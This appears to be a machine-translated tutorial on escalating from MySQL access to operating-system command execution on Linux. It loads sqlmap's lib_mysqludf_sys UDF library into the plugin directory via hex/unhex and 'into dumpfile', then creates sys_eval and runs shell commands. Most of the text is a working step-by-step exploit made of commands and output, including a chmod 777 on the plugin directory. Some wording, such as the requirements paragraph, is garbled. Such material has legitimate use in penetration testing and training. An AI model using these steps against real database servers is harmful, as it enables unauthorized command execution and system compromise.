Using the UDF Library in Linux to achieve Mysql elevation _ MySQL-mysql tutorial

Linux uses the UDF library to implement Mysql Elevation of Privilege

Environment:
OS: linux (bt5)

Database: mysql

Brief description:
The user-defined library function is used to execute arbitrary programs. the test is passed only in linux. the dll used is naturally different in windows.

Requirements:
The mysql database must have a func table, and the UDF will be disabled when the function has been enabled using the primary key grant Role tables;

Process: obtain the path of the plug-in library and find the udf library file of the corresponding operating system. use the udf library file to load the function and execute the command.

1. obtain the plug-in library path.

mysql> show variables like "%plugin%";+---------------+-----------------------+| Variable_name | Value         |+---------------+-----------------------+| plugin_dir  | /usr/lib/mysql/plugin |+---------------+-----------------------+1 row in set (0.00 sec)

2. find the udf library file of the corresponding operating system.
Because I tested it myself, I checked my system version, 64-bit

root@bt:~# uname -aLinux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

Udf files are included in the sqlmap tool. you only need to find the version of the corresponding operating system.

root@bt:/pentest/database/sqlmap/udf/mysql# lslinux windowsroot@bt:/pentest/database/sqlmap/udf/mysql/linux# ls32 64root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# lslib_mysqludf_sys.so

3. use the udf library file to load the function and execute the command
First, you must obtain the hexadecimal format of the udf library file.

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';Query OK, 1 row affected (0.04 sec)

During the test, the built-in account and account name mysql are not root, so the plug-in directory cannot be written. In reality, generally, the udf privilege escalation is a mysql program started with the root permission, therefore, there is no situation where directory permissions are insufficient and cannot be accessed. To continue, modify directory permissions

Root @ bt :~ # Chmod 777/usr/lib/mysql/plugin

Write the udf library to the mysql database directory in the database:

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';Query OK, 1 row affected (0.04 sec)

View the functions supported by this udf Library.

root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so         w _Jv_RegisterClasses0000000000201788 A __bss_start         w __cxa_finalize         w __gmon_start__0000000000201788 A _edata0000000000201798 A _end0000000000001178 T _fini0000000000000ba0 T _init         U fgets         U fork         U free         U getenv000000000000101a T lib_mysqludf_sys_info0000000000000da4 T lib_mysqludf_sys_info_deinit0000000000001047 T lib_mysqludf_sys_info_init         U malloc         U mmap         U pclose         U popen         U realloc         U setenv         U strcpy         U strncpy0000000000000dac T sys_bineval0000000000000dab T sys_bineval_deinit0000000000000da8 T sys_bineval_init0000000000000e46 T sys_eval0000000000000da7 T sys_eval_deinit0000000000000f2e T sys_eval_init0000000000001066 T sys_exec0000000000000da6 T sys_exec_deinit0000000000000f57 T sys_exec_init00000000000010f7 T sys_get0000000000000da5 T sys_get_deinit0000000000000fea T sys_get_init000000000000107a T sys_set00000000000010e8 T sys_set_deinit0000000000000f80 T sys_set_init         U sysconf         U system         U waitpid

Finally, load the function and execute:

mysql> create function sys_eval returns string soname "mysqludf.so";Query OK, 0 rows affected (0.14 sec) mysql> select sys_eval('whoami');+--------------------+| sys_eval('whoami') |+--------------------+| mysql       |+--------------------+1 row in set (0.04 sec) mysql> select * from mysql.func;+----------+-----+-------------+----------+| name   | ret | dl     | type   |+----------+-----+-------------+----------+| sys_eval |  0 | mysqludf.so | function |+----------+-----+-------------+----------+1 row in set